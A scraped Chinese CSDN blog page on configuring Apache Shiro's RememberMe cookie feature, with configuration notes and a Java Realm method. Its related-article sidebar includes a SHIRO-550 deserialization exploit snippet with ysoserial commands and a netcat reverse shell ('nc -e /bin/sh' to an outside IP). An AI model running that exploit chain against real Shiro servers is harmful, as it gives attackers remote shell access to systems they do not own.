java 记住密码 安全_Java 通过 Shiro 配置 RememberMe 实现记住密码功能

最新推荐文章于 2023-05-15 10:33:40 发布
最新推荐文章于 2023-05-15 10:33:40 发布
阅读量577 收藏
点赞数
文章标签: java 记住密码 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29692851/article/details/114850794
版权

Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理功能,可为任何应用提供安全保障 - 从命令行应用、移动应用到大型网络及企业应用。下面讲述一下如何实现记住密码,一般记住密码就是把用户的基本信息存入浏览器Cookie,下次登录时优先验证Cookie,后端做处理操作,依此来实现记住密码操作,而shiro中自带RememberMe功能,只需简单配置即可。

注意:对于安全性要求高的网站不建议有记住密码功能,因为Cookie是保存在本机电脑浏览器中,不排除其他用户使用该电脑,复制走Cookie,导入其他电脑继续使用该账号登录。

具体操作如下:

1、配置application-shiro.xml文件,RememberMe 配置和rememberMe管理器,具体代码如下:

rememberMeCookie即记住我的Cookie并保存时长7天;rememberMe管理器中参数cipherKey是加密rememberMe Cookie的密钥;默认AES算法。

2、设置securityManager安全管理器的rememberMeManager,具体配置如下:

/login.jsp = anon

/authenticated.jsp = authc

/logout = logout

/** = user

注意:/authenticated.jsp = authc”表示访问该地址用户必须身份验证通过(Subject. isAuthenticated()==true);而“/** = user”表示访问该地址的用户是身份验证通过或RememberMe登录的都可以进行任何操作的。

3、认证MyShiroRealm.java类,是进行登录认证信息判断操作的,具体代码如下:// 获取认证信息

protected AuthenticationInfo doGetAuthenticationInfo(

AuthenticationToken authcToken) throws AuthenticationException {

CaptchaUsernamePasswordToken token = (CaptchaUsernamePasswordToken) authcToken;

String username = token.getUsername();

if (username != null && !"".equals(username)) {

User users = (User) en.single("from User where isDeleted=0 and name=?0",username);

if (users != null) {

return new SimpleAuthenticationInfo(users, users.getPassword(), getName());

}

}

return null;

}

注意:Cookie对长度是有限制的,不能全部把用户信息存储到Cookie中,不然会出现数组下表越界错误,即return new SimpleAuthenticationInfo(user.getUsername(), user.getPassword(), getName())存入SimpleAuthenticationInfo对象时不能把所有对象信息放入其中的。

王梓键
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Boot系列(十五) 安全框架Apache Shiro(三)RememberMe
xtiawxf的专栏
09-22 1万+
Shiro提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下: 首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe的Cookie写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端还是知道你是谁,且能正常
Shiro的rememberMe功能
weixin_65824274的博客
07-05 1553
当登录后是可以正常访问/man的主页的,如果使用了记住功能,会在浏览器写入cookie,关掉浏览器不需要登录即可直接访问/main.Shiro 提供了记住我(RememerMe)的功能,比如访问一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。4.但是,如果我们访问电商平台时,如果要查看我的订单或进行支付时,此时还 是需要再进行身份认证的,以确保当前用户还是你。2.登录时不勾选记住我,关闭浏览器访问主页/main还会拦截到登录页;1.配置记住功能的cookie设置;
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
Apache Shiro 的Remember Me
王浩的技术博客
10-18 284
Shiro中提供“记住我”的功能,其与已认证有着明显的区别: l Remembered(记住我):一个记住我的Subject 不是匿名的,而且有一个已知的身份ID(也就是subject.getPrincipals()是非空的)。但是这个被记住的身份ID 是在之前的session 中被认证的。如果subject.isRemembered()返回true,则Subject 被认为是被记住的。 l...
Apache Shiro(七)——Shiro的RememberMe功能
传臣、的博客
10-28 9424
一、概述 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下: 1、首先在登录页面选中 RememberMe 然后登录成功;如果是浏览器登录,一般会把 RememberMe 的Cookie 写到客户端并保存下来; 2、关闭浏览器再重新打开;会发现浏览器还是记住你的; 3、访问一般...
Shiro】4、Shiro实现记住登录功能
热门推荐
Asurplus
05-22 20万+
用户每次在登录系统时需要重新输入账户、密码、验证码等信息,非常麻烦,于是要求加一个记住登录的功能,这对于 Shiro 来说是非常简单,下面就让我们一起来实现记住登录功能 一、使用场景 在登录界面,我们需要放置记住登录的选择框,当用户勾选“记住登录”后,在用户下次打开浏览器进入系统时,能够无感登录,即不需要进入到登录界面输入用户信息 二、功能开发 1、当用户勾选“记住登录”后,我们在登录接口需要接受是否记住登录这个参数 @ApiOperation(value = "登录验证") @ApiImpl
febs_shiro_jwt-master_java_;shiro;jwt_
10-04
1. 认证:Shiro提供了RememberMe、Session管理等机制,实现用户登录验证。 2. 授权:基于角色的访问控制(RBAC),可以精细化到方法级别的权限控制。 3. 安全API:Shiro提供简单易用的API,开发者可以轻松实现复杂的...
springmvc+shiro实现记住功能以及权限缓存.rar
07-20
这个名为"springmvc+shiro实现记住功能以及权限缓存.rar"的压缩包文件,显然包含了如何在Spring MVC应用程序中利用Shiro实现"记住我"功能以及权限缓存的示例代码和配置。 首先,让我们深入了解"记住我"功能。在...
跟我学Shiro第13章Demo(RememberMe)
09-23
通过这个Demo,你可以学习到如何在实际项目中配置和使用Shiro的RememberMe功能,以及如何与Ehcache缓存系统进行集成。同时,它也展示了如何在Jetty服务器上运行和测试Shiro应用。对于Java开发者来说,掌握这些知识将...
shiro记住登录信息
08-29
总之,Shiro 的 RememberMe 功能通过设置和管理特定的 Cookie,实现了用户登录状态的持久化,从而在关闭浏览器后仍然能够记住用户身份。但为了平衡用户体验和安全性,开发者在实际应用中应合理控制 RememberMe 的...
Java-Shiro学习思维导图.zip
最新发布
08-20
Java Shiro 是一个强大且灵活的开源安全框架,用于身份认证、授权和会话管理等安全领域的应用开发。学习 Java Shiro 可以通过思维导图来梳理核心概念和学习路径,以下是一个简要的 Java Shiro 学习思维导图。 Java ...
快速掌握shiro安全框架(四)之remember me功能
bigdata_dog的博客
03-04 899
ShiroConfig配置类中添加记住我和cookie相关配置项以及用户过滤器
Shiro反序列问题修复
weixin_38277138的博客
05-15 1928
Shiro反序列问题修复
java记住我_记住我remember-me功能的几种实现方式
weixin_35306450的博客
02-26 1081
本文讨论几种“记住我”功能实现方式。原理:用户登录后,服务端为用户生成一个Token,并放入客户端Cookie中。下次用户登录,服务端验证Cookie中的Token并自动登录。简单的Token生成方法Token=MD5Hex(username+分隔符+expiryTime+分隔符+password)CookieValue=Base64(username+分隔符+expiryTime+分隔符+To...
java security 详解_Spring Security Remember me使用及原理详解
weixin_36202603的博客
02-24 490
Remember me功能就是勾选"记住我"后,一次登录,后面在有效期内免登录。先看具体配置:pom文件:org.springframework.bootspring-boot-starter-data-jpaorg.springframework.bootspring-boot-starter-securitySecurity的配置:@Autowiredprivate UserDetailsSe...
在 Web 项目中应用 Apache Shiro 开源权限框架
百威
03-28 234
Apache Shiro功能强大并且容易集成的开源权限框架,它能够完成认证、授权、加密、会话管理等功能。认证和授权为权限控制的核心,简单来说,“认证”就是证明你是谁? Web 应用程序一般做法通过表单提交用户名及密码达到认证目的。“授权”即是否允许已认证用户访问受保护资源。关于 Shiro 的一系列特征及优点,很多文章已有列举,这里不再逐一赘述,本文重点介绍 Shiro 在 Web Appli...
spring security rememberMe 提升安全性 讲解 !
weixin_52834606的博客
09-03 749
spring security RememberMe 提升安全
SpringSecurity+JWT项目实战之Java权限管理实战(六)--RememberMe功能实现
daimeijin的博客
07-24 770
前言 本文是参考尚学堂SpringSecurity精讲,仅作为学习记录使用。 这个系列设计到的技术点如下: SpringSecurity Oauth2 SpringSecurity + Oauth2 SpringSecurity +JWT SpringSecurity + Oauth2 SpringSecurity + Oauth2 + JWT 背景 Spring Security 中 Remember Me 为“记住我”功能,用户只需要在登录时添加 remember-me复选框,取值为true。Spr
Shiro rememberME 自定义rememberMeManager 不能使用
weixin_34393428的博客
07-08 1434
为什么80%的码农都做不了架构师?>>> ...
Java代码使用Shiro中rememberme功能
04-04
这里配置了CookieRememberMeManager来管理remember me功能,同时指定了cookie的名称为“rememberMe”,并设置cookie的httpOnly属性为true,表示只能通过HTTP访问该cookie。另外,设置了cookie的最大有效期为30天。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值